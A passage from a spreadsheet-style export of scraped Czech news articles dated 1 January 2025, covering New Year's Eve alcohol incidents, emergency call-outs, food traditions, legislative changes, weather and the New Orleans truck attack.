tahy a neohrabaným textem. Protože si ovšem napadená žena stěžovala na bolest rukou, byla na místo přivolána zdravotnická záchranné služba a také republiková policie, která si věc převzala k dalšímu šetření. Zbývá tak jen pro úplnost podotknout, že žena byla prakticky střízlivá, zatímco její soused měl v dechu přibližně 2 promile alkoholu . Milí čtenáři, do nového roku 2025 Vám přejeme pevné zdraví, hodně štěstí, spoustu úspěchů a dobrých rozhodnutí! – pj – Autor: Pavel Janík Autor person Pavel Janík</t>
  </si>
  <si>
    <t>221</t>
  </si>
  <si>
    <t>213</t>
  </si>
  <si>
    <t>20250101_108_3696608698_5e0aac04dcc8dd29a942.html</t>
  </si>
  <si>
    <t>5e0aac04dcc8dd29a942</t>
  </si>
  <si>
    <t>Rozhodčí z&amp;nbsp;opileckého skandálu jsou zpět, dostávají druhou šanci</t>
  </si>
  <si>
    <t>Rozhodčí z&amp;nbsp;opileckého skandálu jsou zpět, dostávají druhou šanci Rozhodčí z opileckého skandálu jsou zpět, dostávají druhou šanci Václav Procházka 1. 1. 2025, 15:23 Už je to jasné. Po kouscích, kterými si neudělali nejlepší reklamu, dostanou polští fotbaloví rozhodčí druhou šanci. Bartosz Frankowski a Tomasz Musiał, kteří byli v létě suspendováni za opilecký skandál, odletí v lednu na rozhodcovský kemp do Turecka , kde se budou tradičně chystat elitní polští sudí na jarní část nejvyšších soutěží. Foto: Vlastimil Vacek, Právo Polský rozhodčí Bartosz Frankowski byl v minulosti delegován i na utkání Slavia Praha - Viktoria Plzeň . Článek V případě Frankowského a Musiała to však podle polských médií nebude jen tak. V srpnu byli oba delegováni jako rozhodčí VAR během zápasu mezi Dynamem Kyjev a Rangers v kvalifikaci Ligy mistrů. Den před zápasem v Lublinu , kde ukrajinský tým našel azyl, odešli podle dostupných zpráv z hotelu a popíjeli alkohol . Později byli zadrženi policií poté, co poškodili dopravní značku v ulicích města. V Polsku jim byla nejprve pozastavena činnost na 90 dní. Posledním trestem byla roční diskvalifikace, ale verdikt byl pozastaven. Polský svaz rozhodl, že oba se budou moci vrátit k rozhodcování dříve. Bezvýhradně nezávadné chování je podmínkou k dalším krokům. Do nejvyšší Ekstraklasy se zatím nevrátí „Pro začátek je v jejich případě řeč o druhé a třetí lize,“ upozorňují polská média. Diskuze Sdílejte článek Související témata: Fotbal Liga mistrů UEFA Skandál Alkohol Rozhodčí Návrat Trest Autor: Václav Procházka Autor person Václav Procházka</t>
  </si>
  <si>
    <t>20250101_109_3696592518_da48b9ffb54728005c30.html</t>
  </si>
  <si>
    <t>da48b9ffb54728005c30</t>
  </si>
  <si>
    <t>Záchranáři v noci přijali přes 160 volání na tísňovou linku</t>
  </si>
  <si>
    <t>Záchranáři v noci přijali přes 160 volání na tísňovou linku 1. 1. 2025 | 15:22 Autor: Kateřina Nosková Foto: ZZS ZK ZLÍNSKÝ KRAJ - Silvestrovská noc ve Zlínském kraji byla z pohledu záchranářů velmi podobná jako v předchozích letech. Zdravotnické posádky zasahovaly u více než stovky událostí a operátorky zdravotnického operačního střediska přijaly přes 160 volání na tísňovou linku 155. U řady výjezdů byl společným jmenovatelem alkohol . „ Dvě pacientky mladšího věku ho požily takové množství, že po nezbytném vyšetření a ošetření na místě je naše posádky převezly na dětskou jednotku intenzivní péče,“ informovali záchranáři na webu ZZS ZK. Záchranáři zasahovaly také u třech desítek úrazů a další pacienty ošetřili po napadení. „ K mnoha těmto úrazům by nedošlo, pokud by lidé nebyli pod vlivem alkoholu ,“ pokračovali záchranáři. Záchranáři řešili také jeden typický úraz spojený s použitím zábavné pyrotechniky. „Chlapce petarda poranila v obličeji,“ upřesnili záchranáři ZZS ZK. 1. 1. 202515:22 Autor: Kateřina Nosková Autor person Kateřina Nosková Rubrika transition_slide Co se děje</t>
  </si>
  <si>
    <t>4970</t>
  </si>
  <si>
    <t>20250101_11_3698308870_2a117184aa0d08ecaed3.html</t>
  </si>
  <si>
    <t>2a117184aa0d08ecaed3</t>
  </si>
  <si>
    <t>Na novoroční tabuli nesmí chybět čočka. Vyhýbat byste se měli rybám či drůbeži</t>
  </si>
  <si>
    <t>Na novoroční tabuli nesmí chybět čočka. Vyhýbat byste se měli rybám či drůbeži Michaela Klárová 1. 1. 2025, 22:00 Jsou jídla, která byste na Nový rok rozhodně neměli konzumovat. Zapovězena je například drůbež. Naopak podle tradic existují pokrmy, které by 1. ledna na jídelní tabuli neměly chybět. Strávníkům totiž v nadcházejícím roce mohou přinést štěstí a blahobyt. Pojídání čočky na Nový rok prý přinese štěstí a peníze. Podle lidových tradic svým tvarem připomíná mince. Luštěninu každoročně na 1. ledna nevynechá ani paní Romana Šálková z Českých Budějovic . Tradice se prý snaží dodržovat hlavně kvůli dětem. "Říká se, že to přináší peníze. Naopak se vyhýbáme králičímu, rybímu a kuřecímu masu, protože by nám mohlo odhopkat, odplavat nebo odletět štěstí," sdělila. "Já nemám čočku rád, ale na Nový rok ji jím, protože mě mamka nutí," prohlásil její syn Dominik. Blahobyt by mohla zajistit konzumace i jiných luštěnin. Stejně kouzelnou moc má prý hrách. Někteří lidé místo čočky volí variantu fazolí, ty se jí především ve Spojených státech . V Rakousku a Maďarsku nesmí chybět vepřové a některé národy upřednostňují vepřové rypáčky. Vepři totiž zaryjí čumák do země, necouvají a postupují vpřed, a tak by měl podle pranostik vypadat i následující rok. Fazole pověst šťastné potraviny dostaly už ve starověkém Egyptě . Důvod jejich pojídání na Nový rok je ale spíše pragmatický, stejně jako ostatní luštěniny byly dříve dostupné i těm nejchudším lidem. Pojídání 12 kuliček hroznového vína nebo jakéhokoliv kulatého ovoce na Nový rok k nám zřejmě dorazilo od Španělů. Jednotlivé sladké hrozny symbolizují vždy jeden šťastný měsíc v roce. Někdo naopak peče sladké moučníky, do kterých zapéká mince. Šťastný strávník, který ji ve své porci najde, prožije podle pranostiky rok v blahobytu. Naopak rčení nejíst ryby, aby štěstí neuplavalo, rozhodně neplatí ve skandinávských zemích. Šupiny ryb symbolizují peníze. Na asijských stolech zase nesmí chybět nudle, jejichž délka symbolizuje dlouhý život. atpr, TN.cz Autor: Michaela Klárová Autor Michaela Klárová</t>
  </si>
  <si>
    <t>486030</t>
  </si>
  <si>
    <t>20250101_110_3696598670_3e61bd42acb4b6dd82fb.html</t>
  </si>
  <si>
    <t>3e61bd42acb4b6dd82fb</t>
  </si>
  <si>
    <t>Chobotnice dostala žízeň, najdete ji do 12&amp;nbsp;sekund?</t>
  </si>
  <si>
    <t>Chobotnice dostala žízeň, najdete ji do 12&amp;nbsp;sekund? Chobotnice dostala žízeň, najdete ji do 12 sekund? Silvestrovské drinky jsou již vypité. Ale novoroční drink také není k zahození. Dostala na něj chuť i chobotnice. Dokážete ji v časovém limitu najít? Je tu Nový rok 2025, tak je třeba si na něj připít dobrým drinkem a vůbec nemusí být s alkoholem . Na jeden nealko dostala chuť i chobotnice a chce si s vámi přiťuknout do nového roku. Nejdříve ji však musíte najít, a to do pouhých 12 sekund. Bavte se obrázkovými postřehovými úkoly i v novém roce. Relaxovat a bystřit mysl, je třeba neustále. Otestujte svůj novoroční postřeh a do 12 sekund najděte na obrázku chobotnici. Přiťukli jste si s chobotnicí do nového roku? Pokud ano, váš postřeh je i v novém roce skvělý. Jestliže jste chobotnici nenašli, buď je váš postřeh po oslavách otupělý nebo to chce více trénovat. Na obrázku níže se můžete podívat, kde se chobotnice nachází. Krásný celý nový rok.</t>
  </si>
  <si>
    <t>20250101_111_3696581896_c56017ca640ae485f5c4.html</t>
  </si>
  <si>
    <t>c56017ca640ae485f5c4</t>
  </si>
  <si>
    <t>Víno Pinot gris 2022, pozdní sběr, Vinařství Oulehla</t>
  </si>
  <si>
    <t>Víno Pinot gris 2022, pozdní sběr, Vinařství Oulehla /100 8. 12. 2024 „Křišťálově čiré víno , velmi světle žluté barvy se slámovými odlesky a středně dobrou viskozitou. Harmonická, čistá, velmi decentní jemná vůně přináší aroma postupně rozkvétající louky s medem či květovým nektarem, pak přichází lískový oříšek a velmi jemný nádech ušlechtilého dřeva i koření. Bohatá, středně plná, přitom ne však výrazná suchá chuť, pokračuje v jemnosti vůně, k tónům z buketu se přidává zelené jablko, lehce i citrusy a jemný nádech koření, připomínající pobyt v barikovém sudu. Citrusová kyselinka se snoubí se sladkým tříslem a medem v delším svěžím závěru.“ /100 13. 5. 2024 „5. v intenzivnější polovině moravských Rulandských modrých v dubnovém kole našich dálkových degustací. Blíže o pravidlech a možnosti účasti přes můj profil. V pořadích jednotlivých degustátorů se umístilo následovně: 1,5,5,5,3,5,2,4,3.“ /100 26. 11. 2024 „1. v jemnější polovině moravských Merlotů a Cabernetů v listopadovém kole našich dálkových degustací. Blíže o pravidlech a možnosti účasti přes můj profil. V pořadích jednotlivých degustátorů se umístilo následovně: 1,1,2,4,3,3,1,2,3.“ Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20250101_112_3697098221_51e4232b1558074af124.html</t>
  </si>
  <si>
    <t>51e4232b1558074af124</t>
  </si>
  <si>
    <t>Silvestrovská noc v Baťově nemocnici byla klidnější</t>
  </si>
  <si>
    <t>Silvestrovská noc v Baťově nemocnici byla klidnější 01.01.2025 15:14 ZLÍN - Silvestrovská noc byla – pokud se jedná o urgentní příjem Krajské nemocnice T. Bati ve Zlíně – co do závažnosti úrazů celkem klidná, nedošlo k žádným vážným úrazům nebo poraněním. „Zato alkohol hrál jako obvykle prim – na traumatologii bylo ošetřeno kolem a po půlnoci 10 lidí, z toho devět pod vlivem alkoholu včetně jednoho, který kombinoval alkohol s návykovou látkou. Většina z nich po pádech, kdy naštěstí utrpěli pouze povrchová poranění typu oděrky a rány, které jim lékaři zašili a propustili je domů,“ uvedla Dana Lipovská, tisková mluvčí KNTB. Vypíchnout by se podle ní dal případ muže, který popsal, že po vypití 13 panáků tvrdého alkoholu „proběhl“ skleněnou výplní dveří. Hospitalizován zůstal pouze muž, který má po rvačce zlomenou horní čelist i nos a čeká na vystřízlivění a operaci. „Po půlnoci bylo dost plno také na naší interní pohotovosti, lékaři ošetřili celkem devět lidí s průjmovými problémy, křečemi v břiše, problémy se zažíváním. Nikdo z nich nebyl hospitalizován,“ dodala mluvčí. Vlastimil Langer Zdroj: Krajská nemocnice T. Bati ve Zlíně Ilustrační foto: Archiv SNZK Rubrika transition_slide Zpravodajství</t>
  </si>
  <si>
    <t>80</t>
  </si>
  <si>
    <t>20250101_113_3696978752_31c694e795498a79b045.html</t>
  </si>
  <si>
    <t>31c694e795498a79b045</t>
  </si>
  <si>
    <t>Slunečné počasí v Krkonoších skončilo, na Sněžce vítr v nárazech o síle orkánu</t>
  </si>
  <si>
    <t>Slunečné počasí v Krkonoších skončilo, na Sněžce vítr v nárazech o síle orkánu 1. ledna 2025 15:10 Sdílet článek ilustrační snímek | foto: Metro.cz Sedm dní trvající slunečné inverzní počasí v Krkonoších dnes skončilo. Hřebeny hor byly většinu dne v silné mlze. Hory zasáhl i silný vítr. Na Sněžce měl v nárazech sílu orkánu. Horní úsek lanovky na Sněžku byl kvůli tomu od rána mimo provoz. Provoz ostatních lanovek v Krkonoších vítr neomezil, zjistila ČTK u provozovatelů areálů. Podle dat měřicí stanice na poštovně Anežka na vrcholu Sněžky měl vítr dnes odpoledne rychlost v nárazech téměř 150 kilometrů v hodině. Hranice orkánu činí 117,7 km/h. Teplota se po 14:00 na vrcholu hory pohybovala okolo minus čtyř stupňů Celsia, ale pocitová teplota byla kvůli větru kolem minus 17 stupňů. Lanovka na Sněžku může být v provozu do rychlosti větru 60 kilometrů za hodinu. Silný vítr s nárazy o rychlosti až 90 kilometrů v hodině by měl být v Krkonoších i ve čtvrtek. "Přes naše území bude postupovat studená fronta od severozápadu a ukončí inverzní ráz počasí. Na horách čekáme výrazné ochlazení pod nulu a pocitovou teplotu bude navíc snižovat i silný vítr," uvedli meteorologové. Rekreanty vracející se domů ze silvestrovských pobytů policie upozornila na dnešní zvýšený provoz na silnicích. V kontrolách zaměřených na řízení pod vlivem alkoholu bude policie pokračovat. "Silvestrovská opatření pro policisty nekončí ani s příchodem nového roku. Hlídky se kromě dohledu nad veřejným pořádkem zaměřují i na bezpečnost na silnicích," uvedla mluvčí hradecké policie Karolína Macháčková. Na hřebenech Krkonoš leží od 40 do 80 centimetrů sněhu. V lavinových katastrech platí první, nejnižší stupeň lavinového nebezpečí z pětidílné mezinárodní stupnice. Všechna lyžařská střediska Krkonoš jsou v provozu. V některých níže položených areálech zůstává kvůli nedostatku sněhu část sjezdovek zatím zavřená. Autor: ČTK Témata: Okres Trutnov | Aktuální zprávy, články a informace Sdílet článek Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>5120</t>
  </si>
  <si>
    <t>20250101_114_3696500409_b51b3a5cc7685a2b027d.html</t>
  </si>
  <si>
    <t>b51b3a5cc7685a2b027d</t>
  </si>
  <si>
    <t>Už dnes platí velké změny pro občany: Vyšší důchody a velké zdražování</t>
  </si>
  <si>
    <t>Už dnes platí velké změny pro občany: Vyšší důchody a velké zdražování 1. 1. 2025 Od nového roku dojde ke zdražování. Foto: Shutterstock S příchodem nového roku vstupuje v platnost řada legislativních úprav, které ovlivní každodenní život mnoha občanů České republiky . Mezi nejvýznamnější patří zvýšení důchodů, zdražení vody a změny v zákoníku práce. Co v článku najdete Vyšší důchody a valorizace penzí Dražší voda a náklady na bydlení Nový zákoník práce Dražší cigarety i alkohol Vyšší důchody a valorizace penzí Od 1. ledna 2025 dochází k valorizaci důchodů. Tento krok je součástí širší důchodové reformy, která byla schválena v roce 2024. Cílem je zajistit adekvátní životní úroveň pro seniory v kontextu rostoucích životních nákladů. Konkrétní částky zvýšení se liší v závislosti na výši dosavadního důchodu a dalších faktorech. Podle Ministerstva práce a sociálních věcí by měla průměrná penze vzrůst o 800 korun měsíčně. Když chcete jít do důchodu později než v běžném důchodovém věku, protože nemáte odpracováno dost let, říká se tomu odložený důchod. Doposud platilo, že jste museli počkat ještě pět let po běžném důchodovém věku. Nově to budou jen dva roky navíc. 💡NENECHTE SI UJÍT 👶 Mateřská 2025: Jak získat maximum peněz a na co si dát pozor? Dražší voda a náklady na bydlení Rok 2025 bohužel přináší i zvýšení cen vody. Podle nejnovějších údajů dojde ke zdražení vodného a stočného v průměru o 12 %. Tento nárůst cen je způsoben rostoucími náklady na provoz a modernizaci vodovodní infrastruktury. Vodohospodářské společnosti argumentují tím, že investice jsou nezbytné pro udržitelnost a kvalitu služeb. „Musíme investovat do obnovy potrubí a zlepšení čistíren odpadních vod, abychom splnili evropské normy,“ vysvětlil ředitel společnosti AquaTech Martin Černý. Pro domácnosti to znamená další náklady v řádech stovek korun ročně. Experti proto radí, aby lidé zvážili úsporná opatření, jako jsou moderní přístroje s nižší spotřebou vody nebo efektivní systémy zalévání zahrad. Přehled nových cen hlavních vodárenských společností najdete ZDE. 💡NENECHTE SI UJÍT 🏢 Ve čtvrtek ráno budou na úřadech fronty: Lidé začnou žádat o porodné Nový zákoník práce Od ledna přichází několik důležitých změn v zákoníku práce, které nám všem usnadní život. Asi nejzajímavější je změna výpovědní lhůty - už nebudeme muset čekat na začátek dalšího měsíce, ale lhůta začne běžet hned, jak výpověď doručíme nebo dostaneme. Novinkou je také možnost delší zkušební doby. Když se na tom domluvíte se zaměstnavatelem, může být u běžných pozic až čtyři měsíce, a pokud jste ve vedoucí pozici, dokonce až osm měsíců. Dobrou zprávu mají rodiče malých dětí. Když se vrátíte z rodičovské do práce dřív, než má dítě dva roky, firma vám musí držet vaše původní místo. To doteď nemusela. Pokud se ale vrátíte později, až když má dítě tři roky, už na původní pozici nárok mít nebudete. Kompletní informace o celém návrhu najdete ZDE. 💡NENECHTE SI UJÍT 💰 Změny daní 2025: Kdo si polepší a kdo zaplatí víc? Dražší cigarety i alkohol Od nového roku nás čeká další zdražení alkoholu a tabáku. Vláda totiž znovu zvedá spotřební daň - u alkoholu o 10 % a u tabáku o 5 %. Je to součást vládního balíčku na ozdravení veřejných financí. U tvrdého alkoholu to není první zdražení - už letos se daň zvedla o 10 % a v roce 2026 půjde nahoru ještě o dalších 5 %. Dobrou zprávu mají pivaři a milovníci vína - u piva a šumivého vína se daň nemění. Tiché víno zůstává bez daně úplně. Malé pivovary dokonce můžou za určitých podmínek platit nižší daň. Zemědělci si zase budou moct dvakrát do roka požádat o vrácení části daně ze zelené nafty. Sociální sítě Chcete vědět vše jako první a získat exkluzivní fotografie, které nikdo nemá? Sledujte nás a připravte se na bohatou nálož aktuálních zpráv. Od ledna se také mění pravidla pro návykové látky. Vzniká nová kategorie psychomodulační látky a kanabinoidy už nebudou na seznamu zakázaných látek. Neznamená to ale, že by si s nimi každý mohl dělat, co chce - jejich prodej a užívání budou přísně hlídané. Nesmí se prodávat mladším 18 let, nesmí vypadat jako hračky nebo sladkosti a nepůjde je koupit v automatech. E-shopy budou muset dodržovat speciální pravidla. Zdroje: autorský text, vlastní dotazování Související články Autor: Michaela Hanelová Autor person Michaela Hanelová</t>
  </si>
  <si>
    <t>20250101_115_3696525235_9a33a129221ec5dea562.html</t>
  </si>
  <si>
    <t>9a33a129221ec5dea562</t>
  </si>
  <si>
    <t>Jak na Nový rok, tak po celý rok: Novoroční tradice, které vám mohou přinést bohatství</t>
  </si>
  <si>
    <t>Jak na Nový rok, tak po celý rok: Novoroční tradice, které vám mohou přinést bohatství Rčení „Jak na Nový rok, tak po celý rok“ zná asi každý. Mnoho lidí věří, že způsob, jakým stráví první den v roce, může ovlivnit jejich štěstí po zbytek roku. Toto přesvědčení se však netýká jen obecného blahobytu, ale také financí. Jaké jsou tradiční praktiky, které mají zajistit finanční prosperitu v novém roce? Novoroční půst a finanční hojnost Jednou z tradic, která souvisí s financemi, je novoroční půst. Tento zvyk je založen na myšlence, že skromný začátek roku povede k bohatému zbytku roku. Lidé věří, že pokud se první den v roce vyhnou přejídání a utrácení, budou po celý rok finančně zodpovědní a dosáhnou finanční stability. Tento půst může být vnímán jako symbolické vyjádření sebekontroly, která je klíčová pro úspěšné hospodaření s penězi. První návštěvník a „šťastná ruka“ V některých kulturách existuje tradice, že první návštěvník, který přijde do vašeho domu na Nový rok, přinese buď štěstí, nebo smůlu. V kontextu financí se věří, že pokud první návštěvník přinese dárek nebo peníze, znamená to, že se po celý rok budete těšit z finančního úspěchu. Naopak, pokud první návštěvník přichází s prázdnýma rukama, může to být špatné znamení pro vaše finance. Někteří lidé dokonce vybírají konkrétní osobu, o které věří, že má „šťastnou ruku,“ aby byla tím prvním návštěvníkem. Jednohubky a tradiční pokrmy V různých kulturách existují specifické pokrmy, které mají na Nový rok přinést finanční hojnost. Například v České republice je tradičním jídlem čočka, která svou podobou připomíná mince a symbolizuje bohatství. Další tradiční pokrm, který by neměl chybět, jsou ryby. Věřilo se, že tak jako ryba plave volně ve vodě, budou i peníze volně plynout do vaší peněženky. V některých zemích, jako je Španělsko , se jí na Nový rok hroznové víno – každý z dvanácti hroznů má symbolizovat jeden měsíc plný prosperity. Být doma a udržovat pořádek Další zvyklostí spojenou s finančním blahobytem je zůstat doma na Nový rok a udržovat pořádek. Věřilo se, že kdo na Nový rok cestuje, bude celý rok „na cestách,“ tedy že se jeho finanční situace bude neustále měnit a bude nestabilní. Udržování pořádku pak symbolizuje finanční čistotu a transparentnost, což jsou důležité aspekty pro dlouhodobé hospodaření. Zajistit, že máte vše na svém místě a žádné dluhy nezůstávají nevyřešené, může být symbolickým startem do nového roku. Vyhýbání se půjčkám a výdajům Na Nový rok byste se měli vyhnout půjčování peněz a velkým výdajům. Tradičně se věří, že pokud na Nový rok někomu půjčíte peníze, budete celý rok finančně ztrácet. Stejně tak pokud na Nový rok uděláte velký nákup, znamená to, že vaše výdaje budou v průběhu roku vyšší, než je zdrávo. Tato tradice je často interpretována jako důraz na finanční uvážlivost a snahu udržet peníze v rodině a domácnosti. Symbolické dárky a jejich význam Poslední tradicí, kterou bychom zmínili, je obdarovávání symbolickými dárky. V některých kulturách se na Nový rok dávají drobné dárky, které mají za úkol přinést štěstí a finanční prosperitu. Mezi takové dárky patří například mince, peněženky s malou hotovostí nebo figurky symbolizující bohatství. Tyto dárky mohou sloužit nejen jako talismany, ale také jako připomínka důležitosti finanční gramotnosti a šetření. Na závěr je dobré si uvědomit, že tyto tradice jsou především symbolické a jejich dodržování může být příjemným rituálem na začátku nového roku. Ať už věříte v jejich magickou moc, nebo je vnímáte jako způsob, jak se zamyslet nad svými finančními cíli, mohou vám pomoci začít nový rok s jasným záměrem a pozitivním naladěním. Vždyť jak na Nový rok, tak po celý rok – a kdo by nechtěl mít své finance pod kontrolou po celý rok? Líbil se ti článek? Sdílej jej přátelům: Každý, kdo se pohybuje v byznysu, musí vědět, jak na ostatní zapůsobit tak, aby si s ním na konci jednání podali O Autorovi Redakce Redaktoři magazínu pro-muže.cz připravují pravidelně atraktivní články o tématech, které zajímají všechny moderní muže. Pokud byste chtěli přispět vašim článkem, můžete oslovit redakci. Stejně tak, se na nás můžete obrátit, v případě zájmu o inzerci. Autor: Redakce Rubrika transition_slide Businessman</t>
  </si>
  <si>
    <t>237</t>
  </si>
  <si>
    <t>20250101_116_3696452475_ff2464cc0ad5bcdd97d1.html</t>
  </si>
  <si>
    <t>ff2464cc0ad5bcdd97d1</t>
  </si>
  <si>
    <t>Letošní Silvestr byl pro policii rušnější než loni. Hlavní roli sehrál alkohol</t>
  </si>
  <si>
    <t>Letošní Silvestr byl pro policii rušnější než loni. Hlavní roli sehrál alkohol Letošní Silvestr byl pro policisty ve Zlínském kraji o něco rušnější než ten loňský. Oslavy příchodu nového roku se však obešly bez mimořádných událostí. „ Na náročnou službu jsme byli tak jako každý rok připraveni, posílili jsme výkon služby,“ informovala policejní mluvčí Simona Kyšnerová. Od šesté hodiny večerní do šesté hodiny ranní přijali policisté na operačním středisku Krajského ředitelství policie Zlínského kraje bezmála 140 oznámení, která se týkala především rušení nočního klidu a přestupků proti veřejnému pořádku nebo občanskému soužití. „ U většiny těchto skutků sehrál roli alkohol . Lidé si také často stěžovali, že je obtěžuje hluk od odpalované zábavní pyrotechniky,“ pokračovala Kyšnerová. Během Silvestra a prvních hodin Nového roku nemuseli policisté řešit žádnou závažnější dopravní nehodu. „ V průběhu noci jsme však narazili na čtyři podnapilé řidiče, kteří jsou podezřelí ze spáchání trestného činu ohrožení pod vlivem návykové látky. Tři z nich nadýchali nad jedno promile, jeden pak nad dvě promile,“ přiblížila policejní mluvčí. Okolo páté hodiny ranní došlo ve Zlíně k fyzickému napadení mezi dvěma podnapilými cizinci, kdy jeden z mužů skončil v nemocnici. „Okolnostmi tohoto incidentu se nyní zabývají zlínští policisté,“ dodala Simona Kyšnerová.</t>
  </si>
  <si>
    <t>20250101_117_3696500765_3bf959dd254a651d694c.html</t>
  </si>
  <si>
    <t>3bf959dd254a651d694c</t>
  </si>
  <si>
    <t>Deset lidí zemřelo v New Orleans poté, co auto vjelo do lidí na ulici</t>
  </si>
  <si>
    <t>Deset lidí zemřelo v New Orleans poté, co auto vjelo do lidí na ulici Policisté na na ulici Bourbon Street ve městě New Orleans , kde nákladní auto vjelo do davu lidí, kteří ještě slavili příchod nového roku. Auto vjelo do davu lidí asi tři hodiny po půlnoci místního času (kolem 10:00 SEČ) na ulici Bourbon Street, která je proslulá rušným nočním životem. 1. ledna 2025. This content is intended for editorial use only. For other uses, additional clearances may be required. AP/Gerald Herbert New Orleans ( USA ) - Deset lidí dnes zemřelo a další tři desítky osob utrpěly zranění ve městě New Orleans poté, co nákladní auto vjelo do davu lidí, kteří ještě slavili příchod nového roku. Informovala o tom agentura AP a další americká média. Stanice CNN s odvoláním na policii uvedla, že najetí do lidí bylo zřejmě úmyslné. Starostka města LaToya Cantrellová čin označila za "teroristický útok", nicméně dodala, že stále probíhá vyšetřování. "Muž řídil pickup a jel po Bourbon Street velmi rychle, bylo to velmi úmyslné chování," řekla novinářům Anne Kirkpatricková z neworleanské policie. Podle ní se muž snažil přejet co nejvíce lidí. Dodala, že nebyl pod vlivem alkoholu a že postřelil dva policisty. Jejich zdravotní stav je stabilizovaný. Kirkpatricková neuvedla, zda je muž ve vazbě, či zda byl také zraněn. Většina ze 30 zraněných jsou podle ní místní obyvatelé, nikoli návštěvníci města. Auto vjelo do davu lidí asi tři hodiny po půlnoci místního času (kolem 10:00 SEČ) na ulici Bourbon Street, která je proslulá rušným nočním životem. Stanice CNN uvedla, že město New Orleans se dnes večer také chystá na čtvrtfinále akce Sugar Bowl, v něm se utkají týmy dvou univerzit v zápase amerického fotbalu. USA neštěstí FLEŠ Autor: AP, Gerald Herbert Autoři person AP person Gerald Herbert</t>
  </si>
  <si>
    <t>20250101_118_3696500766_05990c5a463f1ede66b5.html</t>
  </si>
  <si>
    <t>05990c5a463f1ede66b5</t>
  </si>
  <si>
    <t>Amputace prstů, bitky, ale i srážka s divočáky. Záchranáři měli na Silvestra napilno</t>
  </si>
  <si>
    <t>Amputace prstů, bitky, ale i srážka s divočáky. Záchranáři měli na Silvestra napilno Oslavy příchodu nového roku byly mnohde v Česku náročnější než před rokem. Záchranáři často ošetřovali úrazy způsobené zábavní pyrotechnikou, dokonce i amputace s doživotními následky. Mnohé slavící zmohl alkohol natolik, že zaplnili záchytné stanice. Policie uvedla, že během silvestrovské noci vyjížděla k více konfliktním situacím než v běžný den a řešila i domácí násilí. Policisty nezaměstnávala jen pyrotechnika, ale třeba také srážka čtyř lidí s divokými prasaty. Hasiči celorepublikově evidují 357 požárů, což je nejvíc za minimálně sedm let. V Praze záchranáři během noci vyjeli k 348 případům, s oslavami příchodu nového roku souvisela stovka a zranění zábavní pyrotechnikou bylo devět, řekl mluvčí zdravotnické záchranné služby Karel Kirs. Před rokem zasahovali během noční směny u 229 událostí a úrazů pyrotechnikou bylo sedm. Z centra Prahy minulou noc odvezli do nemocnic 13 lidí. "Nejzávažnější případ představoval úraz hlavy, který si vyžádal napojení pacienta na umělou plicní ventilaci a následný transport do traumacentra," uvedl Kirs na sociální síti X. Policisté v centru Prahy pokutovali za zakázané odpalování pyrotechniky téměř 50 lidí, hlavně cizinců. Úrazy od zábavní pyrotechniky byly častější než loni také ve středních Čechách . Záchranáři zasahovali u šesti zraněných a čtyř popálených. V Libereckém kraji na silvestra až do dnešního rána měli víc než 260 výjezdů, což je zhruba o stovku víc než běžně. Protialkoholní záchytná stanice v Pardubicích byla na silvestra plná již v 20:00, informovala pardubická městská policie. Zranění po požití alkoholu nebo od pyrotechniky zaměstnala záchranáře také v Ústeckém kraji , několik lidí přišlo o část ruky. Mladíkovi z Mostecka pyrotechnika utrhla prsty a část dlaně, řekla ČTK policejní mluvčí Ilona Gazdošová. "Pacienta jsme museli převést do ústeckého traumacentra a uvést ho do umělého spánku. Tam bylo opravdu devastující poranění způsobené zábavní pyrotechnikou," popsal mluvčí záchranářů Prokop Voleník nejvážnější výjezd během letošních oslav příchodu nového roku. Mladík z Mostecka si ponese následky po celý život. Ani v sousedním Libereckém kraji nebyla o případy spojené s bujarými oslavami nouze. Na silvestra až do dnešního rána se záchranáři nezastavili, řešili přes 260 událostí, což je zhruba o stovku víc než běžně. O půlnoci jim na dispečinku svítilo číslo 199, to dlouho nikdo nepamatuje, a do rána bylo dalších 65 událostí, řekl krátce po 06:00 na Nový rok ČTK mluvčí Zdravotnické záchranné služby Libereckého kraje Michael Georgiev. V Moravskoslezském kraji bylo zásahů víc než dvojnásobně oproti běžným nocím, při odpalování pyrotechniky se zranilo osm lidí. Na silnici I/56 u Paskova večer přes komunikaci proběhlo stádo divokých prasat. Dva vozy se srazily se zvířaty. Čtyři lidé se lehce zranili, uvedli moravskoslezští policisté. Naopak za relativně klidnou označili silvestrovskou noc záchranáři z Plzeňského nebo Karlovarského kraje . Policie uvedla, že během silvestra a noci na Nový rok nezaznamenala žádnou mimořádnou událost. "Ale i přesto jsme řešili mnohem více konfliktních případů než v běžný den. Především se jednalo o rušení nočního klidu, různé formy napadání a bohužel i domácí násilí," napsala na síti X. Celorepublikově policisté řešili 3250 případů. "Což je přibližně stejně jako v běžný pracovní den," doplnila. Na Táborsku se ztratil devětašedesátiletý muž, který po 22:00 odešel z večírku v obci Dírná. Policie ho hledala i s použitím vrtulníku, našla ho v jiné obci. Policisté také vyjížděli také k potyčce na ubytovně, při které jeden člověk utrpěl řezné poranění. Zadrželi muže, který v Praze 10 poškodil bezpečnostním kladívkem okna u deseti zaparkovaných vozidel, a také opilého muže, který na Smetanově nábřeží hodil po policejním voze skleněnou láhev. Opilí lidé a jejich úrazy zaměstnávali policisty a záchranáře také v dalších krajích. Ještě ve večerních hodinách policisté v Moravskoslezském kraji řešili například srážku dvou automobilů se stádem divokých prasat nebo nehodu, kdy chodec zakopl o koleje a upadl před projíždějící vlak. Strojvedoucí naštěstí stihl včas zastavit. S pyrotechnikou podle předběžných informací souviselo mezi 20:00 na silvestra a 06:00 na Nový rok 190 výjezdů hasičů, před rokem to bylo 158. Nejčastěji hořely odpadkové koše, kontejnery nebo zbytky odpálené pyrotechniky. Od ní často vzplanuly keře, tráva nebo živé ploty. Na 357 se celorepublikový počet požárů zvýšil z 260 o předchozí silvestrovské noci. Což je nejvíce za minimálně sedm let. Nejrušnější noc měli hasiči v Moravskoslezském a Středočeském kraji , tam z 51 požárů jen čtyři nebyly od pyrotechniky.</t>
  </si>
  <si>
    <t>20250101_119_3879465969_2592a3fd92e037d5d801.html</t>
  </si>
  <si>
    <t>2592a3fd92e037d5d801</t>
  </si>
  <si>
    <t>Vinařství Ampelos - Vrbovec 274</t>
  </si>
  <si>
